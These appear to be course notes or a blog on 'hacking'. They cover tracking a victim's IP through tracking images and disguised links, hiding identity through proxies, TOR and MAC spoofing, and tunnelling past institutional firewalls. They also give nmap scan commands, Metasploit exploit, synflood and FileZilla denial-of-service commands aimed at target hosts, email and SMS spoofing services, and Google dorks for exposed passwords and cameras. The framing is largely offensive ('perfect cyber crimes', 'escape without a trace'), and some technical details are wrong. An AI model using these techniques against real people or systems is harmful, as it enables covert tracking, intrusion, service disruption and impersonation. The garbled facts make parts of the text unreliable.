1. is a hacker ?
A Hacker is NOT a criminal
A hacker is
Somebody who thinks outside the box.
Wants to test his limits
Wants to try things that are not in the manual
Has unlimited curiosity
Discovers unknown features about technology
Dedicated to knowledge
Beleives in stretching the limits
Highly creative
Hackers vs. Crackers
Hackers Crackers
Very knowledgeable
Good guy Bad guy
Help improve security Want to cause cyber destruction
Strong ethics No ethics
Have prior permission No prior permission
Job opportunities: Banking, Telecom, IT/IteS/BPO/KPOs, ecommerce, military, police, retail
industry, etc.
Hacking into a computer is just like breaking into a house.
Steps of a hacker:
1. Identify the victimInformation Gathering
2. Find a loophole/network reconnaissance
3. Actual attack/hack/break in
4. Escape without a trace
Identify the victim:-
Anatomy of an IP address:- An IP address is something anologous to your mobile phone
number. It is something which uniquely identifies your presence on the internet. It is a
32-bit address which is divided into four fields of 8-bit each containing numbers betwen 1
and 255. By simply studying an IP address, we can easily reveal a lot of information
about the network the victim belongs to.
Different classes of an IP address
Class Range Network/Host IDs
A 0.0.0.0 to 126.255.255.255 NETWORK.HOST.HOST.HOST
B 128.0.0.0 to NETWORK.NETWORK.HOST.HOST
191.255.255.255
C 192.0.0.0 to NETWORK.NETWORK.NETWORK.HOST
223.255.255.255
D 224.0.0.0 to Multicast IP addresses. They are IP addresses set
239.255.255.255 aside for special purposes
E 240.0.0.0 to Not in use
255.255.255.255
XX.YY.AA.BB
network ID host ID
Class A: XXX YY.AA.BB
2. Class B: XXX.YY AA.BB
Class C: XX.YY.AA BB
Special IP addresses:
Use IP address
Local loopback address 127.0.0.1
Private IP Address: to be used for computers Class A Network
inside a private network or LAN 10.0.0.0 – 10.255.255.255
Class B Network
172.16.0.0 – 172.31.255.255
Class C Network
192.168.0.0 – 192.168.255.255
Converting IP addresses into different formats:
Format IP Address
Decimal 171.67.215.200
Binary 10101011.01000011.11010111.1001000
Octal 253.103.327.310
Hexadecimal 00AB.0043.00D7.00C8
http://www.csgnetwork.com/ipaddconv.html
Windows Scientific calculator
Tracking victim IP address
www.spypig.com – use to find out the IP address of the victim via sending a tracking
image to victim„s email id.
http://www.getnotify.com/
http://didtheyreadit.com/
http://www.politemail.com/ - commonly used in corporate world
http://readnotify.com/ - creates tracking file like a word or pdf file.
How to trace an email back to its sender ?
1st technique:-
Step 1: Open email headers (Show original option in gmail. In yahoo. Email settings->full
headers)
Step 2: Analyze email headers Manually (the headers contain IP address) or automatically
(2nd technique)using emailtrackerpro (http://www.emailtrackerpro.com/)
3rd technique:- http://blasze.com/iplog/
Simply send a crafted link to your friend
Now we have ORIGINAL URL and VICTIM URL
DISGUISED URL: using URL shortening website s www.bit.ly www.goo.gl
4th technique: www.whatismyipaddress.com
How to find out victim„s IP address using a website ?
Step 1: create your own website/webpage/blog
Step 2: in the homepage, write a java code to extract IP address and MAC address of victim
Step 3: Invite the victim(s)
5th technique: Using chatting software (not a reliable technique though)
Setup a chat with victim and put the below command in dos prompt-
netstat –n
6th technique:- TCPView Software http://technet.microsoft.com/en-
us/sysinternals/bb897437.aspx
Currports http://www.nirsoft.net/utils/cports.html
3. How to trace an IP address to exact geographical location ?
http://visualroute.visualware.com/
NeoTrace pro http://neotrace-pro.en.softonic.com/
3d traceroute http://www.d3tr.de/
loriot pro http://www.loriotpro.com/
geospider http://oreware.com/viewprogram.php?prog=22
http://vtrace.pl/
All are online versions of the simple traceroute command
Ex: tracert www.indiatimes.com
Trace a mobile phone number to its geographical location
http://trace.bharatiyamobile.com/
Tracking stolen smartphone
https://www.lookout.com/
create a lookout account and register your device.
Summary
- What to do to be a hacker
- What is IP address
- How to get somebody„s IP address
- How to trace the IP address„s exact geographic location
- How to track a mobile phone
- How to trace a lost smartphone
Internal and External IP addresses
Introduction to NAT (Network Address Translation)
When the internet was initially created, there was no shortage of any IP addresses.
However, as internet usage spread, an acute shortage of IP addresses was created
worldwide This led to emergence of Network Address Translation.
Advantages of NAT are- It Reduces need for IP addresses, Improves security and Easier
implementation of networks
In a NAT system, nobody from outside world will know IP address of an internal system.
- Identity is protected
- No direct connection
4. In a NAT enabled system, a person from outside, first have to hack into the router
before trying to get into the internal system.
Depending upon the entension number entered, the lookup table is used to route the call
to the appropriate internal system.
How to find out internal IP address & external IP address ?
Internal IP address can be found using
netstat –n
ipconfig /all
External IP address can be found on http://whatismyipaddress.com/
How to hide your IP address ? by using a proxy server
http://www.anonymizer.ru
– online tool/web proxy
Most of the russian proxy websites are free
None of them maintain any record or log files
http://samair.ru/proxy/
http://www.hidemyass.com/ - uses URL encoding so that ”facebook” does not appear on
URL
Torrents:-
How torrents are blocked ?
- Disabling torrent clients
Solution- http://www.bitlet.org/
- Block download of .torrent extension files
Solution- http://www.torrent2exe.com/
http://txtor.dwerg.net/
The perfect cyber crimes are commited by effectively hiding your presence on the internet.
Your presence on the internet can be spoofed or tricked by hiding your IP address as well as
by hiding your system„s MAC address plus with a lethal technique called war driving.
Difference between IP address and MAC address
IP address MAC address
Given by ISP/Network Given by manufacturer and it is static
2 types- static IP address and dynamic IP Your hardware Network Interface Card (NIC)
address like ethernet card, wifi card, bluetooth, etc
has its unique MAC address
DOS command to get your internal IP DOS command to get their respective MAC
address is– addresses is
Ipconfig /all getmac
To get your external IP address, open your
web browser and goto
http://whatismyipaddress.com/
The perfect cyber crimes are commited by-
Proxy bouncing – IP hiding or IP spoofing (Ultrasoft)
MAC spoofing – (MACAddressChanger, MacMakeUp-doesnt work on windows XP,
MadMacs, EtherChange, BWmachak)
War driving – driving on the streets with a laptop and scan for unprotected Wifi networks
(inssider, Netstumbler, Kismet, Airsnort and War Chalking)
Onion routing protocol – provides anonymous, secure, encrypted access to the internet.
Ex- TOR
5. How TOR is better than proxy servers ?
TOR is available as free download from http://www.torproject.org.in/
How to unblock TOR ?
- Change the name of the downloaded TOR exe file
- In the TOR„s proxy settings, change the default port number
- Add bridge relay server URLs to TOR from https://bridges.torproject.org/
Bridge relays (or "bridges" for short) are Tor relays that aren't listed in the main directory.
Since there is no complete public list of them, even if your ISP is filtering connections to all
the known Tor relays, they probably won't be able to block all the bridges.
Incase https://bridges.torproject.org/ is blocked, another way to find public bridge addresses
is to send mail to bridges@torproject.org with the line "get bridges" by itself in the body of
the mail. However, so we can make it harder for an attacker to learn lots of bridge
addresses, you must send this request from an email address at one of the following
domains:
gmail.com
yahoo.com
Types of Proxy servers – SOCKS and HTTP
HTTP proxy servers – allow you to bypass filtering mechanisms and access blocked
content. User sends HTTP request to proxy server, who then reads the Host header in
the HTTP request, connects to the target server and transmits back whatever data the
server sends back. Usually, it works only with HTTP apps. Ex:- anonymizer.com
SOCKS proxy servers allows you to bypass filtering mechanisms and access blocked
content. SOCKS is a protocol that transmits data between source and destination cia a
proxy server without reading any of the contents. Hence it works with all protocols like
TCP, UDP, etc. And will allow you to use all applications (like mail, browsing,
downloading files, etc.) . Ex- TOR
TOR works on port number 9051.
Using TOR, you can hide yourself in skype or any other instant messenger, There are 2
ways to do this-
- Connect the application to TOR
- Connect the application to a proxy
6. - Both cases requires an IP address and port number.
Goto skype tools options connection settings proxy
Give proxy IP as 127.0.0.1 and port number 9051.
Tools:-
Multiproxy (http://multiproxy.org/multiproxy.htm) – allows you to keep proxies all in the same
session. It supports both HTTP and SOCKS. You just need to feed this software with the
proxy servers.
SOCKSCHAIN http://ufasoft.com/socks/ Connects you to a chain of SOCKS or HTTP
proxies (Proxy bond)
ProxyFire http://www.proxyfire.net/
Ultrasurf https://ultrasurf.us/ - Anonumous browsing from your pendrive. It encrypts
connection, hides your IP and unblocks stuff. You can even configure a proxy inside ultrasurf
if your college/organization requires a proxy server to connect to.
Virtual Private Network (VPN)
A VPN is a group of computers connected privately through a public network like Internet.
Usually VPN services gives you an encrypted, secure and anonymous communication
channel. Popular VPN services are:- HideMyAss, IPVanish, StrongVPN, BoxVPN, 12VPN
and GoTrusted.
VPN is like a proxy but in a private network. If Ultrasulf/SOCKS or proxy services doesn„t
work as expected, a VPN service is used. VPN servers, like proxy servers can be in different
parts of the world. Theseservers provide better spped than proxy servers
VPNs are used to access blocked videos in Internet. Ex:- http://www.hidemyass.com/vpn/
HTTP Tunneling
Assume that inside your network, FTP, some websites/torrents are blocked by your firewall.
But no firewall blocks all traffic. HTTP tunneling disguises blocked sites as regular/allowed
http traffic. Let us assume that in your college/company, FTP protocol (port 21) is blocked or
torrents are blocked. The firewall only allows HTTP traffic on port 80, all other ports are
blocked. It is possible to encapsulate FTP or torrent traffic inside HTTP protocol and bypass
the firewall.
Step 1:- Install HTTP tunneling software server on your home or outside computer that has
unrestricted access.
Step 2:- Install HTTPTunneling software client on your college/office computer that has
restricted access.
Step 3:- Now your connection diagram is as follows
YOU FTP or torrent software HTTP Tunneling client sends FTP or torrent traffic
encapsulated into HTTP protocol via port 80 to bypass firewall HTTP Tunneling server on
Home Computer FTP or Torrent Destination
7. Now you can use college computer to access everything on your home network including
unrestricted internet. Ex:- Tunnelizer, HTTPort and HTTPTunnel are good HTTPTunneling
tools.
Super Network Tunnel (http://www.networktunnel.net/) is a commercial tool to perform 2 way
HTTP Tunneling
Home networkcollege network
Some cool stuffs:-
PSIPHON (http://psiphon.ca/)
Proxy workbench (http://proxyworkbench.com/)
Reverse text:- http://www.textmechanic.com/
Upside down text (http://www.upsidedowntext.com/)
Proxy Workbench (http://proxyworkbench.com/)
People Hacking:-
Whatever we do online are tracked in some website.
http://www.pipl.com/
http://www.spokeo.com/
http://www.anywho.com/
http://www.intelius.com/
google maps street view
google earth satellite view
Network reconnaissance and Information gathering
2nd step to hacking
Network reconnaissance is the process of finding out as much information about victim as
possible. Typically an attacker is trying to find out the following about the victim-
- Victim is online/offline
- Network topography
- DNS information
- List of open ports
- DNS information
- Names and versions of software running open ports
- OS details
- Possible security loopholes
Techniques:-
PING sweeping, Traceroute
DNS related tools
LAN surveyors
Port scanning
Daemon Banner Grabbing
OS fingerprinting
Security Auditing
8. How to execute the attack
Ping sweeping
Ping is used to check the connectivity between your computer and the remote computer
(whether you are online, whether victim is online and whether there is connectivity
between both of you)
Ping is used for Denial of Service (DoS) attacks, OS and firewall detection purposes.
Popular sweeping tools are nmap (http://nmap.org/)
http://ping.eu/
Ping using Nmap:-
nmap –sn –v www.google.com
(-sn means No port scan)
Ping by bypassing firewall
nmap –sn –v –Pn www.google.com
Instead of using ICMP echo requests, it connects to port 80
-sn === perform ping. -v == verbose mode (gives you detailed information about what it
is doing)
ICMP echo requests/replies can easily be blocked by a firewall. Hence, -Pn option
attempts to connect to the website or port 80 of www.google.com
Ping sweeping allows you to ping entire range of computers
nmap –sn –v 203.94.1.0-255
Angry IP scanner – ping sweeping tool
Traceroute
When data packets travel from source to destination system, then they do not always
take the same path, Traceroute is a tool that allows you to trace a path between two
systems. Originally it was designed for network troubleshooting but commonly used for
- OS detection
- Firewall detection
- Network topology information
- Geographical location of the target system
How to guess the Operating system running on a remote computer by simply using PING
and TRACEROUTE ?
Time to live (TTL) is a mechanism that limits the lifespan or lifetime of data in a
computer or network. TTL value gets reduced by one everytime data packet reaches a
router. The initial TTL value is determined by the operating system. If I am able to find
out the initial TTL value of a data packet sent by the victim, I can guess the operating
system running on the victim Different Operating systems have different TTL values.
Final TTL value = Initial TTL value-No. of routers
Steps to know what OS www.altoromutual.com is running (it is legal to hack this URL)
Step 1:-
E:Documents and SettingsSYS>ping www.altoromutual.com
Pinging altoromutual.com [65.61.137.117] with 32 bytes of data:
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
Reply from 65.61.137.117: bytes=32 time=289ms TTL=117
Reply from 65.61.137.117: bytes=32 time=290ms TTL=117
9. Ping statistics for 65.61.137.117:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 289ms, Maximum = 290ms, Average = 289ms
Inference:- Final TTL value = 117
117 = Initial TTL value – No. of router hops
Step 2:-
E:Documents and SettingsSYS>tracert www.altoromutual.com
Tracing route to altoromutual.com [65.61.137.117]
over a maximum of 30 hops:
1 <1 ms <1 ms <1 ms 192.168.1.1
2 22 ms 23 ms 25 ms ABTS-KK-Static-001.228.178.122.airtelbroadband.i
n [122.178.228.1]
3 20 ms 21 ms 21 ms ABTS-KK-Static-217.32.166.122.airtelbroadband.in
[122.166.32.217]
4 20 ms 21 ms 21 ms AES-Static-025.102.22.125.airtel.in [125.22.102.
25]
5 185 ms 178 ms 176 ms 125.62.187.189
6 177 ms 178 ms 178 ms ldn-b2-link.telia.net [213.248.71.17]
7 177 ms 178 ms 178 ms ldn-bb2-link.telia.net [80.91.247.26]
8 290 ms 291 ms 291 ms nyk-bb2-link.telia.net [80.91.248.254]
9 * * * Request timed out.
10 * 290 ms 288 ms rackspace-ic-127247-dls-bb1.c.telia.net [213.248
.88.174]
11 290 ms 289 ms 291 ms coreb.dfw1.rackspace.net [74.205.108.52]
12 291 ms 291 ms 291 ms core5.dfw1.rackspace.net [74.205.108.27]
13 290 ms 294 ms 289 ms 67.192.56.19
14 291 ms 289 ms 289 ms 65.61.137.117
Trace complete.
E:Documents and SettingsSYS>
Inference:- Count the number of hops. Eliminate 1st entry (which is source) and last
entry (which is destination) and do not count request timeouts. = 11 router hops Final
TTL value = 113
No. of router hops = 11
117 = Initial TTL value – 11
Initial TTL value = 128
Step 3:-
Now google search for default TTL values of different Operating Systems.
From the URL, http://www.binbert.com/blog/2009/12/default-time-to-live-ttl-values/
TTL value 128 corresponds to some windows based operating system running on victim
(www.altoromutual.com)
Domain Name Server
A DNS lookup is a query sent by a user (browser or IM or email client) to a DNS server
to convert a particular domain name to its respective IP address.
www.whois.net
www.iptools.com
www.betterwhois.com
10. www.dnsstuff.com
www.dnstools.com
www.zoneedit.com/lookup.html
Port Scanning:-
Port scanning is the art of scanning a remote target system to obtain a list of open virtual
ports on it that are listening for connections. This is usually one of the first few steps
every criminal takes.
Popular port scanning tools: nmap, strobe, superscan, etc.
It allows a criminal to identify any potential entry points into a target computer. The
followind covers how to see open ports on some remote computer.
Popular Ports:-
21 FTP
23 Telnet
25 SMTP
53 DNS
80 HTTP
110 POP3
443 SSL/https
513 rlogin
TCP Packet format:-
Flag Types –
SYN == Start a new connection
FIN == End a connection existing
RST == Error Notification
ACK == Data Received Successfully
How are connections established on the Internet ?
3 Step/3 Way TCP/IP Handshake (===== > meaning sends)
Step 1: Client (me)===== > SYN Packet ====== > Host (Google)
Step 2: Host ======== >SYN/ACK Packet====== > Client
Step 3: Client ======= > ACK Packer ==== > Host
Hoe are connections terminated ?
2 steps:-
11. Step 1: Client === > FIN Packet ===== > Host
Step 2: Host == > ACK Packet ===== > Client
(Reverse also needs to happen)
It is possible to create your own packets using colasoft packet builder (Packet
Generator) and Komadia Packet Crafter which is available as free download on the
internet.
TCP CONNECT Port Scan/ TCP Handshake Port Scan:-
Port scan establishes a full 3-way TCP/IP Handshake with all ports on the remote
system.
Procedure:-
ATTACKER sends SYN Packet to TARGET
OPEN:- TARGET sends back a SYN/ACK Packet
CLOSED:- TARGET sends back a RST/ACK Packet
ATTACKER sends ACK/RST Packet back to TARGET
Advantages:- Very accurate, no countermeasures
Disadvantages:- Attacker is Easily Detected/caught
Nmap command:-
nmap –sT –p1 – 100 –Pn www.altoromutual.com
-sT TCP Connect Port Scan
-p Port Range
Second type of scan where detection is difficult is
1) TCP SYN Port Scan/Half Open Scan/Stealth Scan.
Also known as Half Open scan because only half of the complete 3-way TCP/IP
handshake is executed.
ATTACKER sends SYN Packet to TARGET
OPEN: TARGET sends back a SYN/ACK Packet
No Third Step (Unlike previous scan). Considered stealth. Can be detected using
PortSentry on Unix platform (http://sourceforge.net/projects/sentrytools/)
nmap –sF –p1-100 –Pn www.altoromutual.com
NULL/XMAS Port Scan – Stealth but unreliable and varied responses
nmap –sX –p1-100 www.altoromutual.com (all flags set as 1)
nmap –sN –p1-100 www.altoromutual.com (all flags set as 0)
2) IDLE Port Scan (Blind Port Scanning):
Very useful for attacker
It port scans the victim without sending even a single packet to the victim from own IP
address. Every system has fragment ID number which is a 4 digit number that is
increased by 1 each time a packet is sent by it.
Step 1: Probe a zombie machine for their fragment ID.
ATTACKER ===== > sends SYN/ACK packet ======= > ZOMBIE
ZOMBIE ======= > sends back a RST packet with Fragment ID ==== > ATTACKER
Assume recorded fragment ID = 1012.
Step 2: Send spoofed SYN Packet from zombie to victim
OPEN: Victim sends SYN/ACK to Zombie. Zombie sends back a RST and increased its
fragment ID by 1 and becomes 1013.
CLOSED: Victim sends RST to Zombie who discards RST packet and does not change
its fragment ID.
12. Step 3: Probe the fragment ID of Zombie again. If fragment ID increased by 1, then port
on victim is open, else it is closed.
nmap –Pn –p 1-100 –sI <ZOMBIE/Friend‟s IP address> www.altoromutual.com
-sI == > idle port scan
3) ACK Port Scan/Firewall detection scan
Nmap –sA –pN –p 1-100 www.altoromutual.com
This type of scan can be used to determine presence of a firewall filtering out data
packets.
ATTACKER sends ACK packet to TARGET
FIREWALL PRESENT: No response
FIREWALL NOT PRESENT: Target sends back RST Packet.
Other command line port scanning tool: scanline, hping3, etc.
Countermeasures:
- Foolproof countermeasures against port scanning do not exist.
- Close as many ports as possible.
- Filter out certain packets using firewalls, ACLs and other filters using tools like
Scanlogd, BlackICE, Abacus, Portsentry, snort, etc.
Daemon Banner Grabbing
It helps you confirm your guess about the victim Operating System. Once you get to
know list of installed software on victim system, the attacker google searches for
installed software vulnerabilities.
Daemon banner grabbing: It is the process of getting useful information about the
target system by recording the welcome banners of the daemons running on various
ports. It can be used to get the following information about the target system
o Daemon name and version number
o OS information
o Most important, to identify possible points of entry
nmap –sV –p 1-100 www.altoromutual.com
Scanline:-
sl –v –bt 1-100 www.altoromutual.com
Manual technique using Putty (Telnet client)
Telnet to port 80 of victim
Close window on exit option should be set as never
Type HEAD/HTTP/1.0 and press enter.
You will get the victim‟s daemon banner as output.
HTTPRecon
http://www.computec.ch/projekte/httprecon/
Countermeasures:
Edit default daemon message ensuring critical information is not revealed.
Misguide attacker by displaying dales daemon banners.
Use a long false daemon banner and in the background record information about the
attacking client and try to trace him/her.
13. NetCat
Netcat is one of the most popular and widely used networking utilities on the internet. It
can be used to read and write network connections. It is widely used by both criminals
and system administrators.
Netcat is used for-
- Listening to a port
- Connecting to a port
- File transfer
- Chatting
- Executing applications
- Sending spoofed HTTP probes
- Proxy servers
- Port scanning, etc.
It is also used to probe a remote computer for open ports and daemon/software
running on the open ports.
Netcat commands (command line tool):
nc –v www.altoromutual.com 80
HTTP/1.0
Ncat is improved, better version, which comes free with Nmap.
ncat –C www.altoromutual.com 80
get http/1.0
ncat –l 127.0.0.1 8080
opens a port on local machine. Open browser and type 127.0.0.1:8080/ Nothing
happens in the browser. In the command prompt, ncat managed to record some
information about browser. This technique can be used to trace attackers.
Transferring files using ncat:
ncat –l 7000 > output.txt
(opens port 7000 and accepts input on it, which will be saved in output.txt)
Ncat 127.0.0.1 7000 <input.txt
Operating System (OS) Detection
It is important for an attacker to determine what OS is running on the target system. 2
most effective techniques are-
Active Fingerprinting
Passive Fingerprinting
Different OS have different stacks. Hence, different OS responds differently to the
same packet sent to it by same system. This difference in response is used as a
benchmark of differentiating between various operating systems.
Active Fingerprinting: is the process of actively sending data packets to the target
system to generate a response, which is then analyzed and compared to the list of
14. known responses to determine the OS running on the target system. Typically while
analyzing responses, the following fields & techniques can be useful-
TCP Initial Window Size of packets
TTL values
ACK Values of packets
Initial Sequence Number (ISN) values
Handling of overlapped fragments, etc
The attacker can be traced. That means this method is not anonymous.
Nmap commands:-
nmap –O –v www.altoromutual.com
nmap –A –v www.altoromutual.com
Passive Fingerprinting
Problem with active fingerprinting is that it reveals the identity of the criminal
http://lcamtuf.coredump.cx/p0f3/
P0f will try to determine the OS information by simply analyzing the data packets sent
by the target system while performing usual and routine communication like if target
visits your website, sends you a file, etc.
p0f –L .
p0f –i 4 (interface number)
TTL, window size, DF Bit and TOS fields in the reply TCP packet is analyzed to get
remote OS.
OS Detection Countermeasures
Change the default values of your OS like TTL, ISN, etc.
Mislead attacker by configuring default values of some other OS on your system.
Use ACLs to filter out unwanted probing packets.
Security Auditing
It is a technique of scanning the victim computer for any potential security loopholes
that may exist on it, using which an attacker can hack into it.
Tools: Nessus, GFI Languard, Retina Scan, SAINT, Core Impact, NSAuditor (Not
Free)
Attacking target computer using METASPLOIT
In my previous blog, I have covered detailed step by step instructions on how to
collect maximum information about victim in pursuit of getting any possible weak
entry points. It is popularly called Vulnerabilities. Once you get any possible
loopholes or vulnerabilities, it is the perfect time to ATTACK!!!
Metasploit is an open source framework for penetration testing that allows you to test
the security of a network. It had a built in large database of hundreds of known
15. loopholes and vulnerabilities for various platforms and software. It allows you to
automatically test a remote system for all these hundreds of security loopholes.
EXPLOIT: is a code, software or tool that misuses a vulnerability or loophole on a
remote machine to cause malicious results on it.
PAYLOAD: is defined as the effect of executing the exploit code and some other
payload code on a remote machine, which allows a medium of communication to be
established between the attacker and the victim. It could be in the form of
modification/deletion of data, getting shell access, file access and others.
Each EXPLOIT will support certain type of PAYLOADS.
STEPS INVOLVED
1. Identify loophole on victim using network reconnaissance, security auditing and
penetration testing.
2. Select and configure that exploit and various exploit options on metasploit.
3. Select victim computer and victim port.
4. Select payload you wish to launch with exploit code.
5. Launch the attack.
Metasploit Commands:
>help
>banner
>connect www.altoromutual.com 80
Get /HTTP/1.0
>ping www.altoromutual.com
>show exploits
>show payloads
>show auxiliary
>search type:exploit platform: windows unsafe
>info windows/tftp/quick_tftp_pro_mode
>use windows/tftp/quick_tftp_pro_mode
windows/tftp/quick_tftp_pro_mode>show options
windows/tftp/quick_tftp_pro_mode>set RHOST altoromutual.com
windows/tftp/quick_tftp_pro_mode>check
windows/tftp/quick_tftp_pro_mode>exploit
windows/tftp/quick_tftp_pro_mode>back (exit a module)
Port scanning using Metasploit
It is possible to port scan a remote computer using metasploit. All nmap
commands are valid in metasploit.
>search portscan
>use auxiliary/scanner/portscan/tcp
>use auxiliary/scanner/portscan/syn (SYN port scan)
>use auxiliary/scanner/portscan/xmas (XMAS port scan)
>use auxiliary/scanner/portscan/ack (ACK port scan)
>show options
>set RHOSTS www.victim.com
>set RPORTS 1-100
>set verbose true
>run
16. >nmap –sT –p 1-100 –Pn www.victim.com
Daemon Banner Grabbing using metasploit
>use auxiliary/scanner/pop3/pop3_version
>set RHOSTS www.victim.com
>run
Similarly,
>use auxiliary/scanner/pop3/http_version
>set RHOSTS www.victim.com
>run
>use auxiliary/scanner/pop3/smtp_version
>set RHOSTS www.victim.com
>run
(SMTP runs on port 25, port 80 is HTTP and port 110 is POP3)
Grabbing Email Addresses from a website
>search collector
>use auxiliary/gather/search_mail_collector
>show options
>set domain www.victim.com
>run
TCP flooding using metasploit
It is possible to execute a DOS attack against various victims using metasploit
>use auxiliary/dos/tcp/synflood
>set RHOST www.victim.com
>run
FileZilla is a popular FTP server based on windows platform. There are 2 exploit
modules in metasploit that can be used to execute a DOS attack against some
versions of the FileZilla server
>use auxiliary/dos/windows/ftp/filezilla_admin_user
>set RHOST www.victim.com
>run
>use auxiliary/dos/windows/ftp/filezilla_server_port
>set RHOST www.victim.com
>run
Disposable email (anonymous): www.hidemyass.com.
Email Spoofing: is the art of sending a spoofed email from somebody else‟s email account.
www.anonymizer.in/fake-mailer
SMS Spoofing: (Paid service but may be worth)
http://www.spranked.com/
http://www.phonytext.com/
Call Spoofing: http://www.mobivox.com
17. Google Dorks
Google Hacking or Google Dorking is the use of clever google search tags or commands to
try and reveal sensitive data about victims like password files, vulnerable servers and others.
A google dork, according to a hacker slang is somebody whose sensitive data is revealed
with the use of Google Hacking or Google Dorking.
Examples:
info:<web address>
cache:www.facebook.com password (retrieve old cached copy of webpage)
link:www.flyingmachine.co.in
allintitle:Login
allintitle:Login+site:timesofindia.com
allinurl:password login
allinurl:password login+site:www.google.com
inurl:/view.index.shtml (access live cameras)
inurl:/view.indexFrame.shtml Axis
ext:pdf hacking
site:gov inurl:admin login
site:in inurl:admin login
intitle:intranet inurl:intranet+site:in
“Welcome to phpMyAdmin” AND “Create new database”
“index of /etc/passwd”
Google Hacking Database (GHDB)
http://www.hackersforcharity.org/ghdb/
Website Mirroring